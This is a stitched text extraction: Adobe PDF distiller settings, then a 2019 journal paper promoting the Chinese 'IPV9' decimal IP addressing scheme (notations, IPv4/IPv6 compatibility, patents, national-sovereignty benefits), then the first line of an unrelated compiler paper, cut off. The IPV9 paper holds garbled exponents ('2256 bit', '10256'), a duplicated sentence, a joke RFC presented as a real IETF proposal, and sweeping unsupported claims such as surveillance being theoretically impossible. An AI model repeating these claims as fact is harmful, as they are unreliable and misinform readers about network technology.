/JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS <FEFF4f7f75288fd94e9b8bbe5b9a521b5efa7684002000500044004600206587686353ef901a8fc7684c976262535370673a548c002000700072006f006f00660065007200208fdb884c9ad88d2891cf62535370300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c676562535f00521b5efa768400200050004400460020658768633002> /CHT <FEFF4f7f752890194e9b8a2d7f6e5efa7acb7684002000410064006f006200650020005000440046002065874ef653ef5728684c9762537088686a5f548c002000700072006f006f00660065007200204e0a73725f979ad854c18cea7684521753706548679c300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c4f86958b555f5df25efa7acb76840020005000440046002065874ef63002> /DAN <FEFF004200720075006700200069006e0064007300740069006c006c0069006e006700650072006e0065002000740069006c0020006100740020006f007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e007400650072002000740069006c0020006b00760061006c00690074006500740073007500640073006b007200690076006e0069006e006700200065006c006c006500720020006b006f007200720065006b007400750072006c00e60073006e0069006e0067002e0020004400650020006f007000720065007400740065006400650020005000440046002d0064006f006b0075006d0065006e0074006500720020006b0061006e002000e50062006e00650073002000690020004100630072006f00620061007400200065006c006c006500720020004100630072006f006200610074002000520065006100640065007200200035002e00300020006f00670020006e0079006500720065002e> /DEU <FEFF00560065007200770065006e00640065006e0020005300690065002000640069006500730065002000450069006e007300740065006c006c0075006e00670065006e0020007a0075006d002000450072007300740065006c006c0065006e00200076006f006e002000410064006f006200650020005000440046002d0044006f006b0075006d0065006e00740065006e002c00200076006f006e002000640065006e0065006e002000530069006500200068006f00630068007700650072007400690067006500200044007200750063006b006500200061007500660020004400650073006b0074006f0070002d0044007200750063006b00650072006e00200075006e0064002000500072006f006f0066002d00470065007200e400740065006e002000650072007a0065007500670065006e0020006d00f60063006800740065006e002e002000450072007300740065006c006c007400650020005000440046002d0044006f006b0075006d0065006e007400650020006b00f6006e006e0065006e0020006d006900740020004100630072006f00620061007400200075006e0064002000410064006f00620065002000520065006100640065007200200035002e00300020006f0064006500720020006800f600680065007200200067006500f600660066006e00650074002000770065007200640065006e002e> /ESP <FEFF005500740069006c0069006300650020006500730074006100200063006f006e0066006900670075007200610063006900f3006e0020007000610072006100200063007200650061007200200064006f00630075006d0065006e0074006f0073002000640065002000410064006f0062006500200050004400460020007000610072006100200063006f006e00730065006700750069007200200069006d0070007200650073006900f3006e002000640065002000630061006c006900640061006400200065006e00200069006d0070007200650073006f0072006100730020006400650020006500730063007200690074006f00720069006f00200079002000680065007200720061006d00690065006e00740061007300200064006500200063006f00720072006500630063006900f3006e002e002000530065002000700075006500640065006e00200061006200720069007200200064006f00630075006d0065006e0074006f00730020005000440046002000630072006500610064006f007300200063006f006e0020004100630072006f006200610074002c002000410064006f00620065002000520065006100640065007200200035002e003000200079002000760065007200730069006f006e0065007300200070006f00730074006500720069006f007200650073002e> /FRA <FEFF005500740069006c006900730065007a00200063006500730020006f007000740069006f006e00730020006100660069006e00200064006500200063007200e900650072002000640065007300200064006f00630075006d0065006e00740073002000410064006f00620065002000500044004600200070006f007500720020006400650073002000e90070007200650075007600650073002000650074002000640065007300200069006d007000720065007300730069006f006e00730020006400650020006800610075007400650020007100750061006c0069007400e90020007300750072002000640065007300200069006d007000720069006d0061006e0074006500730020006400650020006200750072006500610075002e0020004c0065007300200064006f00630075006d0065006e00740073002000500044004600200063007200e900e90073002000700065007500760065006e0074002000ea0074007200650020006f007500760065007200740073002000640061006e00730020004100630072006f006200610074002c002000610069006e00730069002000710075002700410064006f00620065002000520065006100640065007200200035002e0030002000650074002000760065007200730069006f006e007300200075006c007400e90072006900650075007200650073002e> /ITA <FEFF005500740069006c0069007a007a006100720065002000710075006500730074006500200069006d0070006f007300740061007a0069006f006e00690020007000650072002000630072006500610072006500200064006f00630075006d0065006e00740069002000410064006f006200650020005000440046002000700065007200200075006e00610020007300740061006d007000610020006400690020007100750061006c0069007400e00020007300750020007300740061006d00700061006e0074006900200065002000700072006f006f0066006500720020006400650073006b0074006f0070002e0020004900200064006f00630075006d0065006e007400690020005000440046002000630072006500610074006900200070006f00730073006f006e006f0020006500730073006500720065002000610070006500720074006900200063006f006e0020004100630072006f00620061007400200065002000410064006f00620065002000520065006100640065007200200035002e003000200065002000760065007200730069006f006e006900200073007500630063006500730073006900760065002e> /JPN <FEFF9ad854c18cea51fa529b7528002000410064006f0062006500200050004400460020658766f8306e4f5c6210306b4f7f75283057307e30593002537052376642306e753b8cea3092670059279650306b4fdd306430533068304c3067304d307e3059300230c730b930af30c830c330d730d730ea30f330bf3067306e53705237307e305f306f30d730eb30fc30d57528306b9069305730663044307e305930023053306e8a2d5b9a30674f5c62103055308c305f0020005000440046002030d530a130a430eb306f3001004100630072006f0062006100740020304a30883073002000410064006f00620065002000520065006100640065007200200035002e003000204ee5964d3067958b304f30533068304c3067304d307e30593002> /KOR <FEFFc7740020c124c815c7440020c0acc6a9d558c5ec0020b370c2a4d06cd0d10020d504b9b0d1300020bc0f0020ad50c815ae30c5d0c11c0020ace0d488c9c8b85c0020c778c1c4d560002000410064006f0062006500200050004400460020bb38c11cb97c0020c791c131d569b2c8b2e4002e0020c774b807ac8c0020c791c131b41c00200050004400460020bb38c11cb2940020004100630072006f0062006100740020bc0f002000410064006f00620065002000520065006100640065007200200035002e00300020c774c0c1c5d0c11c0020c5f40020c2180020c788c2b5b2c8b2e4002e> /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR <FEFF004200720075006b00200064006900730073006500200069006e006e007300740069006c006c0069006e00670065006e0065002000740069006c002000e50020006f0070007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740065007200200066006f00720020007500740073006b00720069006600740020006100760020006800f800790020006b00760061006c00690074006500740020007000e500200062006f007200640073006b0072006900760065007200200065006c006c00650072002000700072006f006f006600650072002e0020005000440046002d0064006f006b0075006d0065006e00740065006e00650020006b0061006e002000e50070006e00650073002000690020004100630072006f00620061007400200065006c006c00650072002000410064006f00620065002000520065006100640065007200200035002e003000200065006c006c00650072002000730065006e006500720065002e> /PTB <FEFF005500740069006c0069007a006500200065007300730061007300200063006f006e00660069006700750072006100e700f50065007300200064006500200066006f0072006d00610020006100200063007200690061007200200064006f00630075006d0065006e0074006f0073002000410064006f0062006500200050004400460020007000610072006100200069006d0070007200650073007300f5006500730020006400650020007100750061006c0069006400610064006500200065006d00200069006d00700072006500730073006f0072006100730020006400650073006b0074006f00700020006500200064006900730070006f00730069007400690076006f0073002000640065002000700072006f00760061002e0020004f007300200064006f00630075006d0065006e0074006f00730020005000440046002000630072006900610064006f007300200070006f00640065006d0020007300650072002000610062006500720074006f007300200063006f006d0020006f0020004100630072006f006200610074002000650020006f002000410064006f00620065002000520065006100640065007200200035002e0030002000650020007600650072007300f50065007300200070006f00730074006500720069006f007200650073002e> /SUO <FEFF004b00e40079007400e40020006e00e40069007400e4002000610073006500740075006b007300690061002c0020006b0075006e0020006c0075006f0074002000410064006f0062006500200050004400460020002d0064006f006b0075006d0065006e007400740065006a00610020006c0061006100640075006b006100730074006100200074007900f6007000f60079007400e400740075006c006f0073007400750073007400610020006a00610020007600650064006f007300740075007300740061002000760061007200740065006e002e00200020004c0075006f0064007500740020005000440046002d0064006f006b0075006d0065006e00740069007400200076006f0069006400610061006e0020006100760061007400610020004100630072006f0062006100740069006c006c00610020006a0061002000410064006f00620065002000520065006100640065007200200035002e0030003a006c006c00610020006a006100200075007500640065006d006d0069006c006c0061002e> /SVE <FEFF0041006e007600e4006e00640020006400650020006800e4007200200069006e0073007400e4006c006c006e0069006e006700610072006e00610020006f006d002000640075002000760069006c006c00200073006b006100700061002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740020006600f600720020006b00760061006c00690074006500740073007500740073006b0072006900660074006500720020007000e5002000760061006e006c00690067006100200073006b0072006900760061007200650020006f006300680020006600f600720020006b006f007200720065006b007400750072002e002000200053006b006100700061006400650020005000440046002d0064006f006b0075006d0065006e00740020006b0061006e002000f600700070006e00610073002000690020004100630072006f0062006100740020006f00630068002000410064006f00620065002000520065006100640065007200200035002e00300020006f00630068002000730065006e006100720065002e> /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_dbgv2rgi25gz3jaoh7aktxtj3i ---- International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 40 Research on the Technology of Assign IP Address to the Connected Computer Based IPV9 Wang Hui School of Computer Science and Engineering Xi'an Technological University Xi'an, 710021, China e-mail: 277019826@qq.com Liu Lingwen Shandong Radio, Television and Network Co. LTD. Tai'an Branch e-mail: 13345296196@163.com Yu Zhikai 1,2 1 Chinese Decimal Network Working Group, Shanghai, China 2 Shanghai Decimal System Network Information Technology Ltd. e-mail: viktoryuzk@163.com Li Ming 1,2 1 Chinese Decimal Network Working Group, Shanghai, China 2 Shanghai Decimal System Network Information Technology Ltd. e-mail: minxiaoli88@163.com Abstract—With the widely application of Internet and the distribution is not reasonable in the beginning, the IPv4 address space is becoming less and less and there are fewer available IP addresses, in order to expand the address space, IPv6 was appeared, but it did not consider the network security in the first designing and have some shortcomings, it has not widely used in the world in its 20 years. LETF proposed some basic dreams of IPv9 in 1994, and looked forward to the idea of network in the 21st century. However, due to the lack of research results of basic theories, technical problems of address exhaustion and layering, and development costs and other factors, it failed publicly. The IPv9 working group was disbanded in 1997. On the basis of previous studies, Chinese scholar and research team proposed a new Internet architecture by using the decimal system (or the whole digital code) to assign IP addresses to the connected computers. This paper will research on the countless address of the new generation Internet - IPV9, and describe the characteristics of the new technology Keywords-Internet; IPV9; Representation; Characteristics I. THE EMERGENCE OF THE NEW GENERATION OF THE INTERNET IPv4 is the most widely used protocol on the Internet, and its address space is 232. In the early stage of the Internet, due to the underestimation of the development trend of the Internet, IP allocation was unreasonable, and IP resources were very limited. By 2010, there was no address that could be allocated. In order to solve the problem of insufficient addresses, researches proposed IPv6, IPv6 has 2128 addresses in theory, however, only one-eighth of the addresses can actually be allocated to end users. That is, the number of addresses that can be actually allocated is only 2125, which is equivalent to 1037. At present, 128 barcodes are already having 128 bits, and it cannot be covered, so IPv6 have some considerable limitations. In 1998, Chinese researcher proposed IPV9 — A method of using whole digital code to assign address for computer. In order to distinguish from IPv4 and DOI: 10.21307/ijanmc-2019-046 International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 41 IPv6 in the United States, the V in IPV9 proposed by China is uppercase, not lowercase. The patent for IPV9 includes three technologies: a new address coding design, a new addressing mechanism and a new address architecture design. These technologies constitute the core technology system at the bottom of the new generation IP network. The new network framework designed on this basis can form a network system that is connected and compatible with existing networks (Internet using IPv4 and IPv6 technologies). IPV9 is not a simple upgrade of IPv4 and IPv6, and its number of addresses is 10256. The massive address of IPV9 can meet the needs of domain name address resources for human activities in 750 years, and it is the simplest domain name address system. In 2011, the authoritative professional institutions of the US government have confirmed legally and technically that China has the core technology of sovereign network with independent intellectual property rights under the IP framework. This is the patented technology of IPV9 which is different from the existing technology of the US Internet. The official patent name is "Method of using whole digital code to assign address for computer". The IPV9 protocol uses 0-9 Arabic digital network as the virtual IP address and uses decimal as the text representation method, which is a convenient way to find online users. IPV9 has a large number of assignable IP addresses, and the maximum number of address bits is 2 × 2048. In order to improve efficiency and facilitate end users, some addresses can be used directly as domain names, which is the cornerstone of the future digital world. At the same time, IPV9 is also called "New Generation Security and Reliable Information Integrated Network Protocol" because it uses the classification and coding of the original computer network, cable broadcast television network and telecommunication network. IPV9 obtained Chinese patent in 2001 (CN98 1 22785), and has obtained authorized patents successively in more than ten countries and regions, including South Africa, Turkey, Kazakhstan, Russia, South Korea, North Korea, Hong Kong, Canada, Singapore, Australia, Mexico and Norway. IPV9 applied for US patent in 2004. It was issued seven times of "non-final rejection opinion" and six final rejections by the US Patent Office. During this period, it was repeatedly criticized by senior members of the US IETF and famous American IT companies. In December 2011, the US Patent and Trademark Office officially issued a patent certificate numbered US 8,082,365, and clearly stated in its approval notice that the appraisal report provided by the applicant was “very convincing”. In December 2011, the US Patent and Trademark Office officially issued a patent certificate numbered US 8,082,365, and clearly stated in its approval notice that the appraisal report provided by the applicant was "very convincing". II. TEXT REPRESENTATION OF THE IPV9 ADDRESS The paper developed a representation of the IPV9 address, including the "parenthesis" notation, the "bracket" decimal representation, and the "brace" decimal notation. A. The Parentheses Notation Since the default length of the IPV9 address is 256 bits, there are still many bits in each segment, whether it is 4 or 8 segments. For example, when using 8 segments, each segment still has 32 bits. This will result in the following situation in one segment: ……]00000000000000000000000000110100]…… ……]01011111111111111111111111111111]…… Such a situation not only makes the input cumbersome, but also tends to have fewer or more bits, which makes the user inconvenient because of dazzling. For convenience, the expression "parentheses"—— （K/L） has been introduced. Where "K" represents 0 International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 42 or 1, and "L" represents the number of 0 or 1. So the above two examples can be abbreviated as: ……]（0/26）110100]…… ……]010（1/29）]…… B. The Bracket Decimal Representation 1) Representation of different digits of IPV9 address a) 2048 bits are represented by "[ ]". 2048 bits in "[ ]" are expressed in decimal, and the length can be indefinite. The "[]" can be omitted when writing in the browser. The representation of the 256-bit IPV9 address is "y[y[y[y[y[y[y[y ", Each y in the address represents 32 bits and can be expressed in decimal, which is 232 =4294967296, so every y is a 10-digit decimal number. Although the range of digits in decimal is 0~9, it is stipulated in the paper that the range of the first digit from the left of y can only be 0~4, so that no overflow occurs. An example of this method is as follows: 0000170170[0000062062[0000000000[000000000 0[0000000000[0000000000[0000210210[0000422422 In the address representation, multiple consecutive zeros on the left of each decimal number can be omitted, but the all-zero decimal number needs to be represented by a zero. For example, the above address can be written as: 170170[62062[0[0[0[0[210210[422422 To further simplify the representation of the address, a consecutive all-zero fields in the address can be replaced with a square bracket [X] (X is the number of segments of the all-zero field). For example, the above address can be abbreviated as: 170170[62062[4][210210[422422 Another example: 0[0[0[0[0[0[0[1,can be abbreviated as [7]1 0[0[0[0[0[0[0[0,can be abbreviated as [8] 2) Type of IPV9 address There are five types of IPV9 addresses, which are described below. a) Full IPV9 address The full IPV9 address is the form: Y[Y[Y[Y[Y[Y[Y[Y, where Y represents a decimal integer from 0 to 232 = 4294967296. b) IPV9 address compatible with IPv4 The form of this address is: Y[Y[Y[Y[Y[Y[Y[D.D.D.D, where Y represents a decimal integer from 0 to 232 = 4294967296. D represents a decimal integer between 0 and 255 in the IPv4. c) IPV9 address compatible with IPv6 The form of this address is: Y[Y[Y[Y[X:X:X:X:X:X:X:X, where Y represents a decimal integer from 0 to 232 = 4294967296. X represents a hexadecimal number from 0000 to FFFF in the IPv6. d) Special compatible address In order to upgrade from IPv4 and IPv6 to IPV9 smoothly, some compatible addresses are designed in this paper. Among them, some of the IPv6 addresses are compatible addresses designed to be compatible with IPv4 addresses. In order to transition these addresses to IPV9 addresses smoothly, special treatment has been done in this paper: add the appropriate prefix before this part of the address. In order to make their representations more intuitive and avoid errors caused by negligence in writing, a shorthand approach was introduced: y[y[y[y[x:x:x:x:x:x:d.d.d.d Where, each y represents an address of 32 bits and is expressed in decimal. Each x represents a 16-bit IPv6 address, expressed in hexadecimal. Each d represents an 8-bit IPv4 address, expressed in decimal. For example: International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 43 0[0[0[0[14714747[1199933[223556889[147258369 It can be written into:0[0[0[0[E0:877B:12:4F3D:D53:3519:3.198.252.1 or:[4]E0:877B:12:4F3D:D53:3519:3.198.252.1 For another example: 0[0[0[0[0[0[0[562159487 It can be written as: ::33.129.223.127. "::" is a representation of the compressed form in an IPv6 address, and a single contiguous sequence of multiple 0 blocks is represented by a double colon symbol "::". The decimal number 562159487 is expressed in dotted decimal notation as 33.129.223.127. e) Full decimal address In order to facilitate the application of the logistics code and the full decimal address, it is recommended to use the category number 5, in the 512th power of 10, according to the application, it is necessary to adopt a fixed length non-positioning method. f) Full decimal address IPV9 is compatible with the Internet of IPv4 and IPv6 technology protocols, but IPv4 and IPv6 technology protocols cannot be backward compatible with IPV9. The concept of compatibility is parallel coexistence, which is a gradual and modest transfer of applications and data services, rather than directly replacing or replacing existing protocols. In order to solve the problem of transition from IPv4 to IPV9 smoothly, up to now, a lot of money has been invested in the Internet, and the transition address of IPV9 has been specially designed. A segment of the address is taken from the IPV9 address space, and about 232 are allocated to allocate IPv4. A small number of changes can be made on the current system to achieve the above objectives, in which IPV9 has a section of J.J.J.J., each J represents a decimal number, from 0 to 28 , that is 0~255. Among them, the previous [7] can be omitted in the middle of the local address, that is, the local user (or designated user) can be directly used by J.J.J.J., and is distinguished from the IPv4 D.D.D.D. In order to transition to full decimal smoothly, you can assign decimals to these users at the same time, so that you don't have to re-address when you improve software and hardware in the future. For example, [7]5211314 can be written as [7]3.48.155.175. In a local domain IP network, you can write with 3.48.155.175 directly, so that the original terminal can be used. In order for the original user to be compatible with the current user, there should be a new record in the IPV9 DNS record. Any system that uses a transitional IPV9 address can use the original IPv4 system with appropriate modifications. At the same time, the header uses the IPv4 header, but the version number is 9, to distinguish the original IPv4. However, the user terminal in the local domain can use the original terminal device.  When the category number is 0, the address length is 16 bits, and the physical address of IPv4 will be discarded, and the 16-bit address of the IPv4 host will be used. The representation method is 65535 in decimal or 0-255.0-255 in dotted decimal notation, which is the same as hexadecimal FF.FF;  When the category number is 1, the address length is 32 bits, indicating that the method is decimal 0-4294967295, and the corresponding character length or dotted decimal 0-255.0-255.0-255.0-255, and hexadecimal FF.FF. FF.FF has the same effect;  When the category number is 2, the address length is 64 bits, indicating that the method is decimal 10 or the corresponding character length;  When the category number is 3, the address length is 128 bits, indicating that the method is decimal or the corresponding character length.  When the category number is 4, the address International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 44 length is 256 bits, indicating that the method is decimal or the corresponding character length.  When the category number is 5, the address length is 512 bits, indicating that the method is decimal or the corresponding character length.  When the category number is 6, the address length is 1024 bits, indicating that the method is decimal or the corresponding character length.  When the category number is 7, the address length has no fixed length, indicating that the method is a decimal length or a corresponding character length. C. Braces decimal This method represents a 256-bit address divided into four 64-bit decimal numbers and the braces separating them. This method first divides the 256-bit address into four 64-bit decimal numbers and the braces separating them, and then represents them. The form of the representation is "Z}Z}Z}Z". Each Z represents the address as a 64-bit portion and is represented in decimal. It is used in exactly the same way as Y, and is compatible with Y, and can be mixed. This greatly facilitates the compatibility of these IPv4 addresses in IPV9. For example: z}z}z}z; z}z}y]y]y]y; z}z}y]y]y]d.d.d.d; z}z}z}y]d.d.d.d; z}z}z}y]J.J.J.J; Especially the last address format is most useful. For example: The address 0}0}0}0]193.193.193.193 It can be expressed like this: {3}0]193.193.193.193 Finally, it should be noted that the use of square brackets and braces in the symbolic representation is not affected. That is, no distinction between "{" and "}", "[" and "]". This definition is taken in view of the fact that this does not cause any side effects and is more user-friendly. D. Text representation of the address prefix The scheme of IPV9 address is similar to the schemes of IPv4 super net and CIDR (classless addressing), which use an address prefix to represent the network hierarchy. On the representation of the IPV9 address prefix, a representation similar to CIDR is used, which has the following form: IPV9 address / address prefix length The address of IPV9 is an address written by the IPV9 address notation. The length of the address prefix is the length of consecutive bits indicating the address prefix from the left in the address. It must be noted that the decimal number is used in the IPV9 address, but the prefix length refers to the binary. Therefore, you must calculate the prefix carefully. However, it is not intuitive in binary numbers. After analysis, it is easier to understand that the IPV9 address prefix is converted to hexadecimal. However, the IPV9 address is still a decimal number. For example: The address prefix of 200 bits is 1314[0[0[0[224[169[0, which can also be expressed as: 1314[0[0[0[224[169[0[0/200 or 1314[3]224[169[0[0/200 or 1314[0[0[0[224[169[2]/200 or 1314[3]224[169[2]/200 It should be noted that in the representation of the address prefix, the representation of the IPV9 address portion must be legal, that is, the IPV9 address to the left of the slash "/" must be restored to the correct address. International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 45 In this address prefix, you can see that the length of the address prefix is 200. Therefore, the prefix is actually the first 6 segments of the entire address plus the first 8 bits of the seventh segment (32×6＋8=200). So the seventh segment of the address is the most critical. This paragraph is expressed in hexadecimal as: ********. Since a hexadecimal digit is equal to 4 bits, the prefix only includes the first two *. Knowing this, you can know that the value of this paragraph is included in 00000000 (hex) ~ 00FFFFFF (hex), which can also be expressed in decimal as 0~16777215. Alternatively, this paragraph is expressed in binary as: **** **** **** **** **** **** **** ****. Because in the binary, one bit occupies 1 bit, the prefix includes the first 8 *, and the range of the value of this segment is 0000 0000 0000 0000 0000 0000 0000 0000~0000 0000 1111 1111 1111 1111 1111 1111, which can also be expressed in decimal as 0~16777215. The IPV9 address can be generated by padding 0 to the right of the address prefix, which can also be a real IPV9 address containing the address prefix. For example, the address prefix in the above example can also be expressed as: 1314[3]224[169[a[b/200 Where, a is an arbitrary decimal number in the range of 0~16777215, and b is an arbitrary decimal number in the range of 0~4294967296. III. FEATURES OF IPV9 The intellectual property of decimal network/digital domain names, including copyrights such as《Overall allocation method for allocating computer addresses with all-decimal algorithms for networked computers》 (Licensed in China in 2004), 《IPV9/Future Network Root Domain Name Server》 and 《CHN National Top Level Domain Server》. In addition, it also includes the Chinese patent license "Method for allocating addresses to computers using Internet with full digital code" (obtained in 2001). These constitute the independent innovation of the complete system of IPV9, including the address space of the decimal network, 13 root name servers, 239 national and regional top-level domain servers. In accordance with the Universal Postal Rules, which are jointly participated by sovereign states under the UN framework. The IPV9 network communication rules, which are protected by Chinese laws and protected by US laws and protected by multinational laws, clearly belong to the public network communication system that is jointly observed by the international community. Any country that respects China's intellectual property rights and the rights of its owners in accordance with the law can use China's IPV9 decimal network/digital domain name network communication rules to build an autonomous and controllable network communication system. At the ISO/IEC Future Network International Conference, Mr. Xie Jianping announced that China's IPV9 is the common wealth of all mankind and won warm applause from the participants. He won the unanimous vote of the members of the United States, Russia, Canada and other countries. The conclusions of China's IPV9's independent innovation ideas and practice verification have been written into the ISO/IEC, "Name and Addressing" and "Security" in the "Representation and Requirements for Future Network Problems" officially released in 2014. China's IPV9 has significant features which are described below. 1) China's IPV9 can be compatible with IPv4 and IPv6, and solves the problem of high cost and repeated investment construction caused by IPv6 not being compatible with IPv4. In addition, IPV9 provides a reliable way for applications (users and services) to transition securely, quickly and smoothly to the IPV9 system platform. At the same time, the system is still safe and effective in the face of any cyber attacks that may occur at any time. International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 46 2) China fully controls all the hardware and software of China's IPV9 system, including the allocation, management and resolution services of all root domain names including the parent root domain, the primary root domain, the child root domain and the dependent root domain. Other countries can't get involved in the illegal control of IPV9. It is impossible theoretically to implement network monitoring, modify the system communication routing table, and close the network address switch arbitrarily. Moreover, it is difficult to achieve from a technical point of view. The IPV9 designed in the paper can enable countries to achieve autonomous control of the root domain name server, which has geographical locations. IPV9 can realize end-to-end direct communication services, can independently build, develop and manage the technical system of domestic cyberspace, and allow countries to cooperate equally and jointly manage the global root domain name resolution system. It is possible to guide and establish a new pattern of the global sovereignty community of destiny. Under the guarantee of the new technical system of IPV9, the realization of future network interconnection, intercommunication, co-management and co-governance between countries has been presented to the sovereign countries of the United Nations. 3) China's IPV9 can determine the level of security, the safety factor, and the power distribution and means of security control. It is fundamentally "not subject to others." IPV9 treats RFID code as an IP address and allows access to the Internet directly, and ensures that it can be exchanged and resolved autonomously in the nearest place in the country. IPV9 can effectively prevent data from being "forwarded" by the "routing" information of the Internet, avoiding data being forwarded globally by the exchange command of the Internet, and avoiding data being monitored and copied by the Internet network image. It can save a lot of energy and overhead, so IPV9 is both environmentally friendly and safe. Any user who applies for and is allowed to own the unique domain name and address of China IPV9 can enter the IPV9 network system of China and enjoy the service at the same time, and is protected by the real “real name” of the system. If there is any misconduct or unforeseen circumstances, you can always trace the traces, trace the certification, and lock the evidence so that the "black hand" has nowhere to hide and escape. 4) China's IPV9 start address is 2256 bit, and can manage 22048 bit address. It can be compressed and recycled on both sides. It can be fixed and not positioned like a telephone system to reduce and save unnecessary overhead costs, increase efficiency. It fully meets the needs of political, business, production, learning, and research users in the field of network science for a long period of time. Therefore, it can fully meet the needs of the political, business, production, learning and research users of the future network in the scientific field for a long time. Because of this, the computer's networking scale can be set as needed, and can be widely used in space communications, nano computers, human cells or DNA computer systems. IPV9 not only goes far beyond the IETF's vision in RFC1606, RFC1607, but also has great advantages compared to IPv6. IPv6 has a 128 bit address, but it can only be unilaterally compressed, not recyclable, and the address is fixed and positioned, the overhead is large, the efficiency is impaired, and the actual address allocation rate is only 0.01-0.03%. 5) China's IPV9 has the basic conditions that must be met by the future network as determined by the ISO/IEC International Organization for Standardization. That is: the basic technical characteristics of the sovereign network; the design flaws and technical disadvantages of the existing networks, including the Internet; and the network is obviously superior to the existing network in terms of controllability, credibility, security and reliability. International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 47 Due to the urgent need for network sovereignty, security and response to emergencies, on the basis of IPv4, IPv6 internet, private network, and local area network, the paper proposes that we should boldly try and build IPV9 network with lower investment. After a period of time, users, applications and services on the existing network can be smoothly migrated to China's IPV9 system, which fundamentally forms the basic protection against attack and anti-virus, and establishes a solid foundation for the transition to a future independent and reliable network. IV. CONCLUSION The key technologies of the new generation (IPV9) Internet were introduced in this paper. The text representation of the IPV9 address includes expressions such as "parenthesis" notation, the "bracket" decimal representation and the "braces" decimal representation. The technology is compatible with IPv4 and IPv6, and provides a reliable way to transit to the IPV9 system platform securely and quickly and smoothly based on IPv4 and IPv6. ACKNOWLEDGMENT Pre-research Project of 13th Five-year Equipment Development(41402020202). The Industrial research project of Science and Technology Department of Shaanxi Province(Grant No. 2016KTZDGY4-09) REFERENCE [1] Mou Chengjin. Accelerate the Construction of China's Independent and Controllable System of Network Security [J]. World Socialism Studies, 2017,2(04):26-28+94. [2] He Jinsong, Peng Zhichao, He Wenhua, Jiang Xuejun. Comparative Study of IPv4, IPv6 and IPv9 [J].SOFTWARE ENGINEERING,2016,19(05):18-20. [3] Zhu Lin. Design and Implementation Intelligent Theater Based on IPV9 and NB-IOT [D]. Beijing University of Posts and Communications, 2018. [4] Zhang Zheqing. Experiment and Application Research Super WiFi with IPV9 [D]. Beijing University of Posts and Communications, 2017. [5] Ding Songbo, Chen Jinying, He Kai. Research on the Application and Development Prospect of IPV9[J]. Communication & Information Technology, 2018(06):42-43+66. [6] Xie Jianping etc. A method of assigning addresses to network computers using the full decimal algorithm[P]. CN: ZL00135182.6, 2004.2.6. [7] Xie Jianping etc. Method of using whole digital code to assign address for computer [P]. US: 8082365, 2011.12. [8] RFC - Internet Standard. Internet Protocol, DARPA INTERNET PROGRAM PROTOCOL SPECIFICATION, RFC 791,1981.09. [9] S. Deering, R. Hinden, Network Working Group.Internet Protocol, Version 6 (IPv6)-Specification, RFC-1883, 1995.12. [10] J. Onions, Network Working Group. A Historical Perspective on the usage of IP version 9. RFC1606. 1994.04. [11] V. Cerf, Network Working Group. A VIEW FROM THE 21ST CENTURY, RFC1607. 1994.04. [12] Xie Jianping, XuDongmei, etc. Digital domain name specification.SJ/T11271-2002, 2002.07. [13] Information technology-Future Network-Problem statement and requirement-Part 2: Naming and addressing, ISO/IEC DTR 29181-2, 2014, 12. [14] Information technology-Future Network-Problem statement and requirement-Part 5: Security, ISO/IEC DTR 29181-5, 2014, 12. work_dcmrfgamtvhcxjgop5zumhpcha ---- Sharing analysis in the Pawns compiler Submitted 22 March 2015 Accepted 11 August 2015 Published 2 September 2015 Corresponding author Lee Naish, 